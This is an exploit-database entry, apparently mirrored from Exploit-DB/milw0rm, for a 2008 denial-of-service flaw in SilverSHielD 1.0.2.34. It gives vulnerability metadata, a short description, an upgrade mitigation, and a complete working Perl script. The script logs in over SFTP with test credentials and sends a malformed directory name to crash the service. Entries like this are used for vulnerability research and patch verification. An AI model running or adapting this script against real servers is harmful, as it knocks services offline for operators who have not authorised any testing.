header-logo
Suggest Exploit
vendor:
SilverSHielD
by:
Jeremy Brown
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: SilverSHielD
Affected Version From: 1.0.2.34
Affected Version To: 1.0.2.34
Patch Exists: YES
Related CWE: N/A
CPE: a:silvershield:silvershield
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SilverSHielD 1.0.2.34 DoS

This exploit is for SilverSHielD 1.0.2.34, which is vulnerable to a Denial of Service (DoS) attack. The exploit uses the Net::SSH2 Perl module to connect to the target host on port 22, authenticate with a username and password, and then attempt to open a directory with a long string of characters. If successful, the exploit will cause the service to crash.

Mitigation:

Upgrade to the latest version of SilverSHielD, which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# SilverSHielD 1.0.2.34 DoS
use Net::SSH2;

$host     = "192.168.0.111";
$port     = 22;
$username = "test";
$password = "test123";
$dos      = "<<<<<<<<<<>>>>>>>>>>";

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port)               || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->opendir($dos);
$ssh2->disconnect();
exit;

# milw0rm.com [2008-10-23]